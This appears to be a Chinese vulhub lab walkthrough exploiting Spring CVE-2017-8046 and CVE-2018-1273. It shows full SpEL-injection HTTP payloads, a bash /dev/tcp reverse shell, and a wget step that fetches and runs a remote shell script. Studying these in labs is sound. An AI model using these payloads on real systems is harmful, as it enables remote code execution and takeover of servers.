当前位置: 首页 > news >正文

Spring框架漏洞攻略

Spring Data Rest 远程(CVE-2017-8046)

vulhub/spring/CVE-2017-8046

访问http://39.105.61.160:8080/customers/1

 使用Burp,抓取数据包

 发送到重放器,修改代码

PATCH /customers/1 HTTP/1.1
Host: 39.105.61.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=43E63C2CE6B221D29E4E404AB7179C0D
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 24 Mar 2025 06:45:11 GMT
If-None-Match: "0"
Priority: u=0, i
Content-Type:  application/json-patch+json
Content-Length: 201

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value":
"vulhub" }]

 修改为自己的ip

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11
5} 表示的命令 touch /tmp/success,创建一个success文件

成功发送数据包之后,可以进⼊docker容器内查看是否执⾏命令

在容器中发现成功创建success

docker ps  

docker exec -it ebf783d6cae2 /bin/bash

ls /tmp

spring 代码执⾏ (CVE-2018-1273)

Spring Data ⼀个于简化数据访持云服务的开源框架Spring Data Commons Spring Data 所有⽬共框架Spring Data Commons 2.0.5 版本中SpEL 达式注漏洞攻击者可以注恶意 SpEL 达式以执任意命令。

 访问靶场地址:http://39.105.61.160:8080/users

随便输入数据,使用Burp抓包

 发送到重放器,修改代码

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t ouch /tmp/crz")]=&password=&repeatedPassword=

 可以看到功写⼊

docker ps

docker exec -it 7eda9043f543 /bin/bash

ls /tmp

反弹shell 

云服⼀个 反弹shell 

bash -i >& /dev/tcp/39.105.61.160:6666 0>&1

 监听6666端口

 

 将刚才的代码修改

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -qO /tmp/shell.sh http://39.105.61.160/1.sh")]=&password=&repeatedPassword=

 shell.sh成功建立

 再次修改(运行shell.php)

 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/shell.sh")]=&password=&repeatedPassword=

之后监听到shell,反弹shell完成 

相关文章:

  • MyBatis-Flex、MyBatis-Plus 与 Fluent-Mybatis 的比较分析
  • FastStoneCapture下载安装教程(附安装包)专业截图工具
  • 环境评价分析中土地利用现状图的制作方法
  • 基于TweenMax和SVG的炫酷弹性进度条动画特效
  • [实操]MySQL8 读写分离后,配合redis的方法与步骤
  • 水星(MERCURY)监控初始化的恢复和转码方法
  • 【C语言】多进程/多线程
  • DeepSeek-R1 现已作为全托管无服务器模型在 Amazon Bedrock上线。
  • 反向 SSH 隧道技术实现内网穿透
  • 数据库误更新操作 如何回滚
  • VMware安装ubuntu22.04.5 server
  • Java并发编程面试汇总
  • Python学习第二十三天
  • 全面了解 Cookies、Session 和 Token
  • 【Java语言】学习笔记-08面向对象【中级】包、访问修饰符、封装、继承、多态、Super、Override(重写)、Object、断点调试等细节详解(上)
  • 6.1、认证技术基础与原理
  • [unity 点击事件] 区域响应点击事件,排除子节点区域,Raycast Target 应用
  • 埋点数据采集方案
  • 14、Python 枚举与类型注解进阶
  • 蓝桥云客 数字接龙
  • 陈芋汐世界杯总决赛卫冕夺冠,全红婵无缘三大赛“全满贯”
  • 塞尔维亚总统因突发健康问题,中断对美国的正式访问并回国
  • 新加坡2025年大选开始投票
  • “五一”看什么?这里有一份申城视听指南
  • 五一期间全国高速日均流量6200万辆,同比增长8.1%
  • 中国固体火箭发动机领域杰出专家赵殿礼逝世,享年92岁